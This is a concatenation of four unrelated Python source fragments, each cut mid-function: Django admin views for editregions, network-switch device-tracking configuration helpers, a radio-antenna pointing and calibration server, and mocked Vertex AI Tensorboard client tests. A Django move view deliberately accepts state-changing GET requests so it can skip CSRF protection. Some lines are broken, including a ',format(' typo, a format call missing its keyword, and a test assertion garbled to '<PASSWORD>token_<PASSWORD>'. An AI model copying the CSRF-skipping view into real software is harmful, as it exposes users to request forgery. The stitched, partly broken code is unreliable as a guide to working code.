model_name = self.model._meta.model_name else: model_name = self.model._meta.module_name info = (app_label, model_name) urlpatterns = patterns('', # parent_ct is the Django ContentType PK for # the object the EditRegionChunks are bound to # eg: a page, a blog post, a project. # parent_id is the PK of the parent object in # question. We don't know what format the PK takes # so we accept anything. #url(r'^(?P<parent_ct>\d+)/(?P<parent_id>.+)/$', url(r'^$', wrap(self.changelist_view), name='%s_%s_changelist' % info), # moving an object from one position to another # potentially across regions. url(r'^move/$', wrap(self.move_view), name='%s_%s_move' % info), # this thing is needed, unfortunately, to enable # the delete screen to work on EditRegionChunk # subclasses. # see https://code.djangoproject.com/ticket/20640 # As I'm not thrilled with the idea of finding # the wrong edit screen ... we're going to # re-point it at the history view. url(r'^(.+)/$', wrap(self.history_view), name='%s_%s_change' % info), ) return urlpatterns urls = property(get_urls) def move_view(self, request): """ Allows us to move a Chunk from one place to another. Yes, it accepts request.GET, because I can't be bothered to monkey patch the jQuery ajax sending to send a CSRF token. Screw it. Data received in the request should be: * `pk` * `position` * `region` The form then handles moving everything in .save() """ form = MovementForm(data=request.GET, files=None, initial=None) if form.is_valid() and self.has_change_permission(request, form.cleaned_data['pk']): form.save() html = self.render_changelists_for_object( request=request, obj=form.cleaned_data['pk'].content_object) json_data = { 'action': 'move', 'html': html, 'primary_key': form.cleaned_data['pk'].pk, } self.log_change(request, *form.change_message()) self.log_change(request, *form.parent_change_message()) return HttpResponse(json.dumps(json_data), content_type='application/json') return HttpResponseBadRequest(json.dumps(form.errors), content_type='application/json') def get_queryset(self, *args, **kwargs): """ Don't use the default queryset/manager, as it won't be our interface to polymorphic (downcast) EditRegionChunk subclasses. :param args: Stuff to pass through to :meth:`~django.contrib.admin.options.BaseModelAdmin.get_ordering` :param kwargs: Stuff to pass through to :meth:`~django.contrib.admin.options.BaseModelAdmin.get_ordering` :return: our EditRegionChunks, but already downcast to their final form. :rtype: :class:`~django.db.models.query.QuerySet` """ qs = self.model.polymorphs.all().select_subclasses() ordering = self.get_ordering(*args, **kwargs) if ordering: # pragma: no cover ... I don't care, this should be fine. qs = qs.order_by(*ordering) return qs queryset = get_queryset def get_object(self, request, object_id): """ This overrides the default, to catch ObjectDoesNotExist, because we can't guarantee what model is being referenced, as it's polymorphic. """ queryset = self.queryset(request) try: return queryset.get(pk=object_id) except ObjectDoesNotExist: return None def get_changelist(self, *args, **kwargs): return EditRegionChangeList def changelist_view(self, request, extra_context=None): parent_ct = request.GET[REQUEST_VAR_CT] parent_id = request.GET[REQUEST_VAR_ID] obj = get_model_class(parent_ct).objects.get(pk=parent_id) extra_context = extra_context or {} if request.is_ajax(): return HttpResponse( self.render_changelists_for_object(request=request, obj=obj)) context = self.changelists_as_context_data(request, obj) opts = self.model._meta app_label = opts.app_label context.update({ 'module_name': force_text(opts.verbose_name_plural), 'title': _('Select %s to change') % force_text(opts.verbose_name), 'media': self.media, 'app_label': app_label, 'cl': { 'opts': { 'app_label': app_label, 'verbose_name_plural': opts.verbose_name_plural, } } }) context.update(extra_context or {}) return TemplateResponse(request, self.change_list_template, context, current_app=self.admin_site.name) def get_changelists_for_object(self, request, obj, **kwargs): changelists = [] if obj is not None: logger.debug('Editing `{obj!r}`, so do ' '`get_changelists_for_object`'.format(obj=obj)) attach_configuration(obj, EditRegionConfiguration) config = get_configuration(obj) # Dynamic template changes ... obj_admin = get_modeladmin(admin_namespace=self.admin_site.name, obj=obj) if hasattr(obj_admin, 'editregions_template_field'): fieldname = obj_admin.editregions_template_field template_name = request.GET.get(fieldname, None) kv = TemplateRequestKeyValue(key=fieldname, value=template_name) if config.is_valid_template(template_name): logger.debug("{kv!r} was valid for this {obj!r} " "and {modeladmin!r}".format( kv=kv, obj=obj, modeladmin=obj_admin)) config.set_template(template_name) # store the old get here, because it gets changed inside the region # loops, which is a lossy process. old_get = request.GET # mutate the querystring and set some data onto it, which will # be passed to the get_changelist_filters method, as well as # being used to filter the ChangeList correctly. # new_get = request.GET.copy() new_get = QueryDict('', mutable=True) new_get[REQUEST_VAR_CT] = get_content_type(obj).pk new_get[REQUEST_VAR_ID] = obj.pk for region in config.config: new_get[REQUEST_VAR_REGION] = region request.GET = new_get our_list_display = self.list_display[:] our_list_links = self.get_list_display_links( request=request, list_display=our_list_display) ChangeList = self.get_changelist(request, **kwargs) cl = ChangeList(request=request, model=self.model, list_display=our_list_display, list_display_links=our_list_links, list_filter=self.list_filter, date_hierarchy=None, search_fields=None, list_select_related=None, list_per_page=100, list_max_show_all=100, list_editable=None, model_admin=self, parent_obj=obj, parent_conf=config) changelists.append(cl) # as the internal request.GET
the tracking for the device - Eg. "enable", "disable", or "default" . Defaults to "default. Returns: None Raises: SubCommandFailure: Failed to add static entry """ cmd = "device-tracking binding vlan {vlan} {address} interface {interface} {mac} tracking {tracking}" cmd = cmd.format(vlan=vlan, address=address, interface=interface, mac=mac, tracking=tracking) try: device.configure(cmd) except SubCommandFailure: log.warning("Failed to add static entry") raise def configure_device_tracking_binding_options(device, reachable_lifetime=None, stale_lifetime=None, down_lifetime=None, max_entries=None, mac_limit=None, port_limit=None, vlan_limit=None, logging=False): """ Configures device-tracking binding options Args: device ('obj'): device object reachable_lifetime ('str', optional): Default max time in REACHABLE without activity - can be 1-86400 or "infinite". Defaults to None stale_lifetime ('str', optional): Default max time in STALE without activity - can be 1-86400 or "infinite". Defaults to None down_lifetime ('str', optional): Default max time in DOWN without activity - can be 1-86400 or "infinite". Defaults to None max_entries ('int', optional): Max number of entries - can be 1-1000000. Defaults to None mac_limit ('int', optional): Max number of mac entries - can be 1-1000000. Defaults to None port_limit ('int', optional): Max number of port entries - can be 1-1000000. Defaults to None vlan_limit ('int', optional): Max number of vlan entries - can be 1-2000000. Defaults to None logging ('bool', optional): Enable syslog logging of binding table events. Defaults to False Returns: None Raises: SubCommandFailure: Failed to configure device-tracking binding """ config = [] debug_dict = { "reachable-lifetime": reachable_lifetime, "stale-lifetime": stale_lifetime, "down-lifetime": down_lifetime, "max-entries": max_entries, "mac-limit": mac_limit, "port-limit": port_limit, "vlan-limit": vlan_limit } if logging: config.append("device-tracking binding logging") # The CLI accepts max-entries limits in the order of vlan->port->mac, # otherwise the options will not be set as intended if max_entries: limit = "max-entries {max_entries} ".format(max_entries=max_entries) if vlan_limit: limit += "vlan-limit {} ".format(vlan_limit) if port_limit: limit += "port-limit {} ".format(port_limit) if mac_limit: limit += "mac-limit {} ".format(mac_limit) config.append("device-tracking binding {limit}".format(limit=limit)) # The CLI accepts lifetime timers in the order of reachable->stale->down, # otherwise the options will not be set as intended if any([reachable_lifetime, stale_lifetime, down_lifetime]): lifetime = "" if reachable_lifetime: lifetime += "reachable-lifetime {} ".format(reachable_lifetime) if stale_lifetime: lifetime += "stale-lifetime {} ".format(stale_lifetime) if down_lifetime: lifetime += "down-lifetime {} ".format(down_lifetime) config.append("device-tracking binding {lifetime}".format(lifetime=lifetime)) try: device.configure(config) except SubCommandFailure: raise SubCommandFailure( "Failed to configure device-tracking binding with parameters: {params} " \ .format(params=debug_dict) ) def unconfigure_device_tracking_binding_options(device, reachable_lifetime=False, stale_lifetime=False, down_lifetime=False, max_entries=False, logging=False): """ Unconfigures device-tracking binding options Args: device ('obj'): device object reachable_lifetime ('bool', optional): Flag to unconfigure reachable-lifetime. Defaults to False stale_lifetime ('bool', optional): Flag to unconfigure stale-lifetime. Defaults to False down_lifetime ('bool', optional): Flag to unconfigure down-lifetime. Defaults to False max_entries ('bool', optional): Flag to unconfigure max-entries lifetime. Defaults to False logging ('bool', optional): Disable syslog logging of binding table events. Defaults to False Returns: None Raises: SubCommandFailure: Failed to unconfigure device-tracking binding """ config = [] prefix_dict = { "reachable-lifetime": reachable_lifetime, "stale-lifetime": stale_lifetime, "down-lifetime": down_lifetime, "max-entries": max_entries, "logging": logging } for key, value in prefix_dict.items(): if value: config.append("no device-tracking binding {key}".format(key=key)) try: device.configure(config) except SubCommandFailure: raise SubCommandFailure( "Failed to unconfigure device-tracking binding with parameters: {params}" \ .format(params=prefix_dict) ) def configure_ipv6_destination_guard_attach_policy(device, policy, interface=None, vlan=None): """ Attach ipv6 destination-guard policy Args: device ('obj'): device object policy ('str'): policy name interface ('str', optional): interface name. Defaults to None vlan ('str', optional): vlan id list - Eg. "1-10,15". Defaults to None. Returns: None Raises: SubCommandFailure: Failed to attach ipv6 destination-guard policy """ if interface is None and vlan is None: raise ValueError("There is no specified target to attach policy." \ "Ensure there is either an interface or a vlan as input") config = [] if interface: config.append("interface {interface}".format(interface=interface)) elif vlan: config.append("vlan config {vlan}".format(vlan=vlan)) config.append("ipv6 destination-guard attach-policy {policy}".format(policy=policy)) try: device.configure(config) except SubCommandFailure: log.warning("Failed to attach ipv6 destination-guard policy") raise def configure_ipv6_destination_guard_detach_policy(device, policy, interface=None, vlan=None): """ Detach ipv6 destination-guard policy Args: device ('obj'): device object policy ('str'): policy name interface ('str', optional): interface name. Defaults to None vlan ('str', optional): vlan id list - Eg. "1-10,15". Defaults to None. Returns: None Raises: SubCommandFailure: Failed to detach ipv6 destination-guard policy """ if interface is None and vlan is None: raise ValueError("There is no specified target to attach policy." \ "Ensure there is either an interface or a vlan as input") config = [] if interface: config.append("interface {interface}".format(interface=interface)) elif vlan: config.append("vlan config {vlan}".format(vlan=vlan)) config.append("no ipv6 destination-guard attach-policy {policy}".format(policy=policy)) try: device.configure(config) except SubCommandFailure: log.warning("Failed to deattach ipv6 destination-guard policy") raise def configure_ipv6_destination_guard_policy(device, policy_name, enforcement=None): """ Configure ipv6 destination-guard policy Args: device ("obj"): The device to configure the policy on policy_name ("str"): the name of the policy enforcement ("str", optional): The enforcement policy to set - Eg. "always" or "stressed". Defaults to None. Raises: SubCommandFailure: Failed to configure ipv6 destination-guard policy {policy_name} """ config_cmds = [] config_cmds.append("ipv6 destination-guard policy {policy_name}".format(policy_name=policy_name)) if enforcement: config_cmds.append("enforcement {enforcement}".format(enforcement=enforcement)) try: device.configure(config_cmds) except SubCommandFailure: log.warning("Failed to configure ipv6 destination-guard policy {policy_name}" .format(policy_name=policy_name)) raise def unconfigure_ipv6_destination_guard_policy(device, policy_name): """ Unconfigure ipv6 destination_guard policy Args: device ("obj"): the device to unconfigure the policy on policy_name ("str"): The name of the policy Raises: SubCommandFailure: Failed to unconfigure ipv6 destination-guard {policy_name} """ try: device.configure([ "ipv6 destination-guard policy {policy_name}".format(policy_name=policy_name), "no enforcement" ]) except SubCommandFailure: log.warning("Failed to unconfigure ipv6 destination-guard {policy_name}" .format(policy_name=policy_name)) raise def configure_device_tracking_tracking(device, auto_source=None, retry_interval=None): """ Configure device-tracking tracking Args: device ("obj"): The device to configure auto_source ("str", optional): The configuration for auto_source - either override or failback address. Defaults to None. retry_interval ("str", optional): Device-tracking retry-interval in seconds. Defaults to None. Raises: SubCommandFailure: Failed to configure device-tracking tracking """ config_cmds = [] if auto_source: if auto_source != "override": config_cmds.append("device-tracking tracking auto-source fallback {fallback_addr}".format(fallback_addr=auto_source)) else: config_cmds.append("device-tracking tracking auto-source override") if retry_interval: config_cmds.append("device-tracking tracking retry-interval {retry_interval}".format(retry_interval=retry_interval)) try: device.configure(config_cmds) except SubCommandFailure: log.warning("Failed to configure device-tracking tracking") raise def clear_device_tracking_database(device, options=None): """ Clear device-tracking database Args: device ('obj'): device object options ('list'): list of policy configuration options to be removed or reset: dictionary contains following keys: address ('dict', optional): address ('str'): IPv4 address or "all" target ('dict', optional): force ('bool', optional): Force to clear all (mac) entries interface ('str', optional): interface policy ('str', optional): policy name vlanid ('str', optional): vlanid force ('bool', optional): Force to clear all (mac) entries interface ('str', optional): target ('str'): interface force ('bool', optional): Force to clear all (mac) entries vlanid ('str', optional): vlanid mac ('str', optional): address ('str'): 48-bit hardware address target ('dict', optional): force ('bool', optional): Force to clear all (mac) entries interface ('str', optional): interface policy ('str', optional): policy name vlanid ('str', optional): vlanid policy ('str', optional): policy name prefix ('bool', optional) address ('str'): IPv6 address (X:X:X:X::X/<0-128>) or "all" target ('dict', optional): force ('bool', optional): Force to clear all (mac) entries interface ('str', optional): interface policy ('str', optional): policy name vlanid ('str', optional): vlanid vlanid ('str', optional): vlan id ex.) [ { "force": True, "mac": { "address": "dead.beef.0001" "target": "force": True "interface": "gigabitEthernet0/0" "policy": "test" "vlanid": 10 } } ] Returns: None Raises: SubCommandFailure: Failed to remove ipv6 source-guard policy configurations """ config = [] prefix = "clear device-tracking database" nested_options_list = [ "address", "mac", "prefix", ] if options is None: config.append(prefix) else: if options.get("force", None): config.append("{prefix} force".format(prefix=prefix)) if options.get("policy", None): config.append("{prefix} policy {policy}".format(prefix=prefix, policy=options['policy'])) if options.get("vlanid", None): config.append("{prefix} vlanid {vlanid}".format(prefix=prefix, vlanid=options['vlanid'])) if options.get("interface", None): interface_dict = options["interface"] if interface_dict.get("interface", None): target = interface_dict["interface"] suffix = "" if interface_dict.get("force", None): suffix = "force" elif interface_dict.get("vlanid", None): suffix = "vlanid {vlanid}".format(interface_dict["vlanid"]) config.append("{prefix} interface {interface} {suffix}".format(prefix=prefix, interface=target, suffix=suffix)) for option in nested_options_list: if options.get(option, None): address_dict = options[option] if address_dict.get("address", None): address = address_dict["address"] opt = "{key} {value}".format(key=option, value=address) suffix = "" if address_dict.get("target", None): target_dict = address_dict["target"] if target_dict.get("force", None): suffix = "force" elif target_dict.get("interface", None): suffix = "interface {interface}".format(target_dict["interface"]) elif target_dict.get("policy", None): suffix = "policy {policy}",format(policy=target_dict["policy"]) elif target_dict.get("vlanid", None): suffix = "vlanid {vlanid}".format(vlanid=target_dict["vlanid"]) config.append("{prefix} {opt} {suffix}".format(prefix=prefix, opt=opt, suffix=suffix)) try: device.execute(config) except SubCommandFailure: raise SubCommandFailure( "Failure to clear device-tracking database" ) def clear_device_tracking_counters(device, interface=None, vlan=None): """ Clear device-tracking counters Args: device ('obj'): device object interface ('str', optional): interface name. Defaults to None vlan ('str', optional): vlan id. Defaults
'az' and 'el' b.compute(self.equipment["Antenna"]) source = b.to_dict() if filter_fn(source): sources[source_name] = source else: self.logger.error( "get_sources: Couldn't find source {}".format(source_name)) now = ephem.now() self.logger.debug( "get_sources: setting Antenna's date to {}".format(now)) self.equipment["Antenna"].date = now # reset time to compute new data self.get_sources.cb(sources) # send client the dict 'sources' if len(sources) == 1: return sources[list(sources.keys())[0]] else: return sources def report_source_info(self, name_or_dict, units="degrees"): """ Create a descriptive string about a given source. Examples: >>> server.report_source_info("0521-365") ["0521-365: az el: 221.960453 -0.494930", "0521-365: ra dec: 80.893983 -36.447495", "0521-365: J2000 ra dec: 80.741603 -36.458570"] Args: name_or_dict (str/dict): The name of a source or verifier or a dictionary containing its calculated position units (str, optional): units in which to report source coordinates. Returns: str: description of source """ if units.lower() == "degrees" or units.lower() == "deg": convert = 180./np.pi elif units.lower() == "radians" or units.lower() == "rad": convert = 1.0 if hasattr(name_or_dict, "keys") and hasattr(name_or_dict, "__iter__"): src_name = name_or_dict["name"] else: src_name = name_or_dict src_info0 = self.get_sources(source_names=src_name) src_info1 = self.get_sources(source_names=src_name, when=datetime.datetime.utcnow()+datetime.timedelta(minutes=5)) if src_info1["el"] > src_info0["el"]: rising = "rising" else: rising = "setting" self.logger.debug( "report_source_info: {}, {}".format(src_name, src_info0)) lines = [] if "info" in src_info0: lines.append( "{}: extra info: {}".format(src_name, src_info0["info"])) lines.append( "{}: az el: {:.6f} {:.6f}".format( src_name, src_info0["az"]*convert, src_info0["el"]*convert)) lines.append( "{}: ra dec: {:.6f} {:.6f}".format( src_name, src_info0["ra"]*convert, src_info0["dec"]*convert)) lines.append( "{}: J2000 ra dec: {:.6f} {:.6f}".format( src_name, src_info0["_ra"]*convert, src_info0["_dec"]*convert)) lines.append( "{}: {}".format(src_name, rising)) return lines def is_within(self, name_or_dict, bounds, axis="el"): """ Determine whether a source is within certain coordinate bounds. Examples: Determine if a given source is in DSS-43's sensitivity sweet spot, between 40 and 60 degrees elevation. .. code-block::python >>> server.is_within("0521-365",(40,60)) False >>> server.is_within("g1107264_302906s", (0, 90), axis="az") True Args: name_or_dict (str/dict): A str corresponding to a source's name, or a dictionary containing the sources information. bounds (list/tuple): The bounds within which we're looking. axis (str, optional): "el" or "az" ("el"). Returns: bool: True if in between bounds, False otherwise """ convert = 180./np.pi src = self._get_source_from_str_or_dict(name_or_dict) axis_val = src[axis.lower()]*convert if axis_val >= bounds[0] and axis_val <= bounds[1]: return True return False def _get_source_from_str_or_dict(self, name_or_dict, **kwargs): """ Given either a name or a dict, get a dictionary corresponding to the source. Args: name_or_dict (str/dict): a name of a source, or a dictionary representation of the source. Returns: dict: a dictionary corresponding to the requested source. """ if isinstance(name_or_dict, six.string_types): src_dict = self.get_sources(source_names=name_or_dict, **kwargs) elif isinstance(name_or_dict, dict): src_dict = name_or_dict else: raise TypeError( "Can't recognize argument name_or_dict of type {}".format( type(name_or_dict))) return src_dict def _get_src_info_dict(self, src_dict): self.logger.debug( "_get_src_info_dict: src_dict: {}".format(src_dict)) src_obj = Aeph.SerializableBody.from_dict(src_dict) self.logger.debug( ("_get_src_info_dict: " "adding source info for source {} to file").format(src_obj.name)) observer = src_obj.get_observer() observer.date = ephem.now() src_obj.compute(observer) src_info = { "name": src_obj.name, "ra_J2000": src_obj._ra, "dec_J2000": src_obj._dec, "az": src_obj.az, "el": src_obj.alt } if "flux" in src_obj.info: src_info['flux'] = src_obj.info["flux"]['K'] return src_info def _add_src_info_to_file(self, f_obj, src_dict): """ Given some source dictionary, add it's information to the attrs of an HDF5 file object or group. Args: f_obj (h5py.File/h5py.Group): HDF5 file object or group src_dict (dict): a dictionary that can be turned into a SerializableBody. """ src_info = self._get_src_info_dict(src_dict) for attr in src_info: f_obj[attr] = src_info[attr] # ------------------------- Observatory Details --------------------------- @support.test.auto_test() def _get_observer_info_dict(self): """ Get a dictionary with current observer information. """ observer_info = { "lat": self.equipment["Antenna"].lat, "lon": self.equipment["Antenna"].lon, "elevation": self.equipment["Antenna"].elevation, "epoch": self.equipment["Antenna"].epoch, "date": self.equipment["Antenna"].date } return observer_info # ------------------------- Antenna Control ------------------------------- def point(self, name_or_dict): """ Go to source Given some source or verifier name or dict, send command to antenna to point. This will not wait for the antenna to be on point, however. This will not point to the source if the source is not currently up. Args: name_or_dict (str/dict): Either a source name or a dictionary Returns: str: result of Antenna.point_radec command """ convert = 180./ np.pi src = self._get_source_from_str_or_dict(name_or_dict) name = src["name"] report = self.report_source_info(src) for line in report: self.logger.info("point: {}".format(line)) if float(src["el"])*convert < 10.0: msg = ("point: {} is currently not up. " "Not pointing. Current az el: {} {}").format( name, float(src["az"])*convert, float(src["el"])*convert) self.logger.error(msg) raise MC.MonitorControlError([], msg) self.info["point"]["current_source"] = src resp = self.hdwr("Antenna", "point_radec", src["_ra"], src["_dec"]) self.logger.debug("point: resp from Antenna: {}".format(resp)) return resp # ------------------------------ Calibration ------------------------------ def _create_calibration_file_path(self, base_dir, prefix, file_type="hdf5"): """ create full path for a calibration file """ self.logger.debug( "_create_calibration_file_path: base_dir: {}, prefix: {}".format( base_dir, prefix ) ) timestamp = datetime.datetime.utcnow().strftime("%Y-%j-%Hh%Mm%Ss") doy, year = datetime.datetime.utcnow().strftime("%j,%Y").split(",") calib_dir = os.path.join(base_dir, year, doy) f_name = "{}_{}.{}".format(prefix, timestamp, file_type) f_path = f_name if not os.path.exists(calib_dir): try: os.makedirs(calib_dir) f_path = os.path.join(calib_dir, f_name) except Exception as err: self.logger.error( ("_create_calibration_file_path: " "Couldn't create calibration directory {}").format( calib_dir)) pass else: f_path = os.path.join(calib_dir, f_name) return f_path def _create_calibration_file_obj(self, base_dir, prefix, file_cls=h5py.File): """ Create a calibration file object. This could be minical, boresight, or tipping. Will create a file object whose path is as follows: .. code-block:none base_dir/<year>/<doy>/prefix_<timestamp>.hdf5 Args: base_dir (str): Base directory where data files are stored. Will store data file in base_dir/<year>/<doy> subdirectory. prefix (str): file_cls (type, optional): """ f_path = self._create_calibration_file_path(base_dir, prefix) self.logger.debug("_create_calibration_file_obj: path is %s", f_path) f_obj = file_cls(f_path, "w") return f_obj, f_path @Pyro5.api.oneway @async_method def scanning_boresight(self, el_previous_offset, xel_previous_offset, limit=99.0, sample_rate=0.3, rate=3.0, settle_time=10.0, src_name_or_dict=None, two_direction=True, additional_offsets=None, channel=0, attrs=None): """ Scanning boresight. Instead of choosing a predetermined set of points and stopping at each point, this sets an initial point, and moves continuously at rate ``rate`` to a final point, collecting system temperature data along the way. Scanning boresight is not yet ready to be used to accurately calculate position offsets. It can be used in situations where initial offsets are not well known, and then improved upon with stepping boresight. Args: el_previous_offset (float): Previous position offset in EL xel_previous_offset (float): Previous position offset in xEL limit (float, optional): How far on either side of initial axis point to start and finish. For example, if initial offset in elevation is 10, and limit is 50, boresight will send antenna to -40, and end up at +60 mdeg in elevation offset. sample_rate (float, optional): How often to attempt to get system temperature data (0.3) rate (float, optional): Offset rate. This is how fast antenna will continuously change offset between initial and ending point (3.0) settle_time (float, optional): Amount of time to settle after setting initial offsets src_name_or_dict (str/dict, optional): A string or dictionary corresponding to a source whose information we want to store with HDF5 results file. two_direction (bool, optional): Whether or not to run boresight in both directions in both axis. Setting this to True results in potentially more accurate offset calculations, at the cost of doubling execution time. additional_offsets (dict, optional): Additional offsets to set before starting boresight. This is necessary because this implementation clears offsets before starting scan. channels (int, optional): Which tsys channel to use to calculate offsets. Defaults to 0. attrs (dict, optional): Additional meta data to add to HDF5 file. Returns: tuple: tsys: tsys data from each power meter for each axis, in each direction, along with offset data, time offsets between tsys data and offsets, and corrected offset measurements. fits: fits from pol1 data for each axis, in each direction """ if additional_offsets is None: additional_offsets = {} if attrs is None: attrs = {} attrs.update(additional_offsets) # we want to include any information # about additional offsets in attrs dict self.logger.debug("scanning_boresights: attrs: %s", attrs) # this is the order of the scans order = ["EL", "XEL"] # these are the commands to the NMC to get the offsets now in use total_offset_params = { "EL": "ElevationManualOffset", "XEL": "CrossElevationManualOffset" } # these are the commands to the NMC to get the currrent rate offsets accum_offset_params = { "EL": "ElevationAccumulatedRateOffset", "XEL": "CrossElevationAccumulatedRateOffset" } # this is the command to get the time for the axis angles timestamp_param = "AxisAngleTime" def timestamp_formatter(t): return datetime.datetime.fromtimestamp(float(t)) # parameters describing scan on one axis single_axis_dict = { "offset": [], "tsys": [], "time_offset": [], "offset_corrected": [], "offset_before":
gca_tensorboard_time_series.TensorboardTimeSeries() client.update_tensorboard_time_series(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "tensorboard_time_series.name=tensorboard_time_series.name/value", ) in kw["metadata"] @pytest.mark.asyncio async def test_update_tensorboard_time_series_field_headers_async(): client = TensorboardServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = tensorboard_service.UpdateTensorboardTimeSeriesRequest() request.tensorboard_time_series.name = "tensorboard_time_series.name/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_tensorboard_time_series), "__call__" ) as call: call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( gca_tensorboard_time_series.TensorboardTimeSeries() ) await client.update_tensorboard_time_series(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ( "x-goog-request-params", "tensorboard_time_series.name=tensorboard_time_series.name/value", ) in kw["metadata"] def test_update_tensorboard_time_series_flattened(): client = TensorboardServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_tensorboard_time_series), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = gca_tensorboard_time_series.TensorboardTimeSeries() # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. client.update_tensorboard_time_series( tensorboard_time_series=gca_tensorboard_time_series.TensorboardTimeSeries( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] arg = args[0].tensorboard_time_series mock_val = gca_tensorboard_time_series.TensorboardTimeSeries(name="name_value") assert arg == mock_val arg = args[0].update_mask mock_val = field_mask_pb2.FieldMask(paths=["paths_value"]) assert arg == mock_val def test_update_tensorboard_time_series_flattened_error(): client = TensorboardServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): client.update_tensorboard_time_series( tensorboard_service.UpdateTensorboardTimeSeriesRequest(), tensorboard_time_series=gca_tensorboard_time_series.TensorboardTimeSeries( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) @pytest.mark.asyncio async def test_update_tensorboard_time_series_flattened_async(): client = TensorboardServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.update_tensorboard_time_series), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = gca_tensorboard_time_series.TensorboardTimeSeries() call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( gca_tensorboard_time_series.TensorboardTimeSeries() ) # Call the method with a truthy value for each flattened field, # using the keyword arguments to the method. response = await client.update_tensorboard_time_series( tensorboard_time_series=gca_tensorboard_time_series.TensorboardTimeSeries( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) # Establish that the underlying call was made with the expected # request object values. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] arg = args[0].tensorboard_time_series mock_val = gca_tensorboard_time_series.TensorboardTimeSeries(name="name_value") assert arg == mock_val arg = args[0].update_mask mock_val = field_mask_pb2.FieldMask(paths=["paths_value"]) assert arg == mock_val @pytest.mark.asyncio async def test_update_tensorboard_time_series_flattened_error_async(): client = TensorboardServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), ) # Attempting to call a method with both a request object and flattened # fields is an error. with pytest.raises(ValueError): await client.update_tensorboard_time_series( tensorboard_service.UpdateTensorboardTimeSeriesRequest(), tensorboard_time_series=gca_tensorboard_time_series.TensorboardTimeSeries( name="name_value" ), update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]), ) def test_list_tensorboard_time_series( transport: str = "grpc", request_type=tensorboard_service.ListTensorboardTimeSeriesRequest, ): client = TensorboardServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_tensorboard_time_series), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = tensorboard_service.ListTensorboardTimeSeriesResponse( next_page_token="next_page_token_value", ) response = client.list_tensorboard_time_series(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == tensorboard_service.ListTensorboardTimeSeriesRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListTensorboardTimeSeriesPager) assert response.next_page_token == "<PASSWORD>token_<PASSWORD>" def test_list_tensorboard_time_series_from_dict(): test_list_tensorboard_time_series(request_type=dict) def test_list_tensorboard_time_series_empty_call(): # This test is a coverage failsafe to make sure that totally empty calls, # i.e. request == None and no flattened fields passed, work. client = TensorboardServiceClient( credentials=ga_credentials.AnonymousCredentials(), transport="grpc", ) # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_tensorboard_time_series), "__call__" ) as call: client.list_tensorboard_time_series() call.assert_called() _, args, _ = call.mock_calls[0] assert args[0] == tensorboard_service.ListTensorboardTimeSeriesRequest() @pytest.mark.asyncio async def test_list_tensorboard_time_series_async( transport: str = "grpc_asyncio", request_type=tensorboard_service.ListTensorboardTimeSeriesRequest, ): client = TensorboardServiceAsyncClient( credentials=ga_credentials.AnonymousCredentials(), transport=transport, ) # Everything is optional in proto3 as far as the runtime is concerned, # and we are mocking out the actual API, so just send an empty request. request = request_type() # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_tensorboard_time_series), "__call__" ) as call: # Designate an appropriate return value for the call. call.return_value = grpc_helpers_async.FakeUnaryUnaryCall( tensorboard_service.ListTensorboardTimeSeriesResponse( next_page_token="next_page_token_value", ) ) response = await client.list_tensorboard_time_series(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) _, args, _ = call.mock_calls[0] assert args[0] == tensorboard_service.ListTensorboardTimeSeriesRequest() # Establish that the response is the type that we expect. assert isinstance(response, pagers.ListTensorboardTimeSeriesAsyncPager) assert response.next_page_token == "next_page_token_value" @pytest.mark.asyncio async def test_list_tensorboard_time_series_async_from_dict(): await test_list_tensorboard_time_series_async(request_type=dict) def test_list_tensorboard_time_series_field_headers(): client = TensorboardServiceClient( credentials=ga_credentials.AnonymousCredentials(), ) # Any value that is part of the HTTP/1.1 URI should be sent as # a field header. Set these to a non-empty value. request = tensorboard_service.ListTensorboardTimeSeriesRequest() request.parent = "parent/value" # Mock the actual call within the gRPC stub, and fake the request. with mock.patch.object( type(client.transport.list_tensorboard_time_series), "__call__" ) as call: call.return_value = tensorboard_service.ListTensorboardTimeSeriesResponse() client.list_tensorboard_time_series(request) # Establish that the underlying gRPC stub method was called. assert len(call.mock_calls) == 1 _, args, _ = call.mock_calls[0] assert args[0] == request # Establish that the field header was sent. _, _, kw = call.mock_calls[0] assert ("x-goog-request-params", "parent=parent/value",) in 